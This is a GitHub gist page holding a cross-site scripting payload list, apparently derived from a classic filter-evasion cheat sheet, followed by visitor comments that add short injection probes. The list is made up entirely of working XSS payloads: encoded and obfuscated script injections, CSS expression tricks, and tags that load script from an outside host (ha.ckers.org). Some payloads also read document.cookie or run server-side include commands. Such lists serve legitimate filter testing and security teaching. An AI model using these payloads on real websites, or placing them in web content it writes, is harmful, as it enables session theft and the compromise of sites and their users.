-
Star
(464)
You must be signed in to star a gist -
Fork
(161)
You must be signed in to fork a gist
-
-
Save rvrsh3ll/09a8b933291f9f98e8ec to your computer and use it in GitHub Desktop.
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
'';!--"<XSS>=&{()} | |
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
<script/src=data:,alert()> | |
<marquee/onstart=alert()> | |
<video/poster/onerror=alert()> | |
<isindex/autofocus/onfocus=alert()> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=JaVaScRiPt:alert('XSS')> | |
<IMG SRC=javascript:alert("XSS")> | |
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> | |
<a onmouseover="alert(document.cookie)">xxs link</a> | |
<a onmouseover=alert(document.cookie)>xxs link</a> | |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |
<IMG SRC=# onmouseover="alert('xxs')"> | |
<IMG SRC= onmouseover="alert('xxs')"> | |
<IMG onmouseover="alert('xxs')"> | |
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img> | |
<IMG SRC=javascript:alert( | |
'XSS')> | |
<IMG SRC=javascript:a& | |
#0000108ert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC="jav ascript:alert('XSS');"> | |
<IMG SRC="jav	ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
<IMG SRC="  javascript:alert('XSS');"> | |
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> | |
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<<SCRIPT>alert("XSS");//<</SCRIPT> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > | |
<SCRIPT SRC=//ha.ckers.org/.j> | |
<IMG SRC="javascript:alert('XSS')" | |
<iframe src=http://ha.ckers.org/scriptlet.html < | |
\";alert('XSS');// | |
</script><script>alert('XSS');</script> | |
</TITLE><SCRIPT>alert("XSS");</SCRIPT> | |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |
<BODY BACKGROUND="javascript:alert('XSS')"> | |
<IMG DYNSRC="javascript:alert('XSS')"> | |
<IMG LOWSRC="javascript:alert('XSS')"> | |
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> | |
<IMG SRC='vbscript:msgbox("XSS")'> | |
<IMG SRC="livescript:[code]"> | |
<BODY ONLOAD=alert('XSS')> | |
<BGSOUND SRC="javascript:alert('XSS');"> | |
<BR SIZE="&{alert('XSS')}"> | |
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> | |
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> | |
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> | |
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> | |
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> | |
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> | |
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> | |
exp/*<A STYLE='no\xss:noxss("*//*"); | |
xss:ex/*XSS*//*/*/pression(alert("XSS"))'> | |
<STYLE TYPE="text/javascript">alert('XSS');</STYLE> | |
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> | |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |
<XSS STYLE="xss:expression(alert('XSS'))"> | |
<XSS STYLE="behavior: url(xss.htc);"> | |
¼script¾alert(¢XSS¢)¼/script¾ | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> | |
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> | |
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> | |
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> | |
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> | |
<TABLE BACKGROUND="javascript:alert('XSS')"> | |
<TABLE><TD BACKGROUND="javascript:alert('XSS')"> | |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> | |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
<DIV STYLE="width: expression(alert('XSS'));"> | |
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--> | |
<BASE HREF="javascript:alert('XSS');//"> | |
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> | |
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> | |
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> | |
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> | |
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> | |
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- | |
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<A HREF="http://66.102.7.147/">XSS</A> | |
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-" | |
veris-->group<svg/onload=alert(/XSS/)// | |
#"><img src=M onerror=alert('XSS');> | |
element[attribute='<img src=x onerror=alert('XSS');> | |
[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ] | |
%22;alert%28%27RVRSH3LL_XSS%29// | |
javascript:alert%281%29; | |
<w contenteditable id=x onfocus=alert()> | |
alert;pg("XSS") | |
<svg/onload=%26%23097lert%26lpar;1337)> | |
<script>for((i)in(self))eval(i)(1)</script> | |
<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt> | |
<sCR<script>iPt>alert(1)</SCr</script>IPt> | |
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a> |
nice
great
">
">
'">
hello
'">
Hello
@t rex game I tried your code and it worked perfectly.
test
<img/src=x>
tast
"><iframe src=x>
">
tes
?post=%26%23%30%30%33%34%3b%26%23%30%30%33%34%3b%26%23%30%30%33%34%3b%26%23%30%30%34%37%3b%26%23%30%30%36%32%3b%26%23%30%30%36%30%3b%26%23%30%30%33%34%3b%26%23%30%30%36%32%3b%26%23%30%30%36%32%3b%26%23%30%30%33%39%3b%26%23%30%30%36%32%3b%26%23%30%30%34%36%3b%26%23%30%30%33%39%3b%26%23%30%31%32%34%3b%26%23%30%30%34%36%3b%26%23%30%30%34%32%3b%26%23%30%30%39%36%3b%26%23%30%30%34%36%3b%26%23%30%30%39%36%3b%26%23%30%30%34%30%3b%26%23%30%30%33%34%3b%26%23%30%30%34%37%3b%26%23%30%30%36%32%3b%26%23%30%30%34%37%3b%26%23%30%30%33%34%3b%26%23%30%30%36%30%3b%26%23%30%31%30%35%3b%26%23%30%31%30%39%3b%26%23%30%31%30%33%3b%26%23%30%30%34%37%3b%26%23%30%31%31%35%3b%26%23%30%31%31%34%3b%26%23%30%30%39%39%3b%26%23%30%30%34%37%3b%26%23%30%31%31%31%3b%26%23%30%31%31%30%3b%26%23%30%31%30%31%3b%26%23%30%31%31%34%3b%26%23%30%31%31%34%3b%26%23%30%31%31%31%3b%26%23%30%31%31%34%3b%26%23%30%30%36%31%3b%26%23%30%30%39%37%3b%26%23%30%31%30%38%3b%26%23%30%31%30%31%3b%26%23%30%31%31%34%3b%26%23%30%31%31%36%3b%26%23%30%30%34%30%3b%26%23%30%30%34%33%3b%26%23%30%31%32%33%3b%26%23%30%31%32%35%3b%26%23%30%31%32%34%3b%26%23%30%31%32%34%3b%26%23%30%30%34%38%3b%26%23%30%30%34%36%3b%26%23%30%30%34%39%3b%26%23%30%30%39%35%3b%26%23%30%30%34%39%3b%26%23%30%30%34%31%3b%26%23%30%30%34%32%3b%26%23%30%30%34%38%3b%26%23%30%30%36%32%3b%26%23%30%30%36%32%3b%26%23%30%30%36%32%3b%26%23%30%30%34%31%3b%26%23%30%30%34%35%3b%26%23%30%30%36%32%3b%26%23%30%30%36%30%3b%26%23%30%30%34%36%3b%26%23%30%30%36%32
hi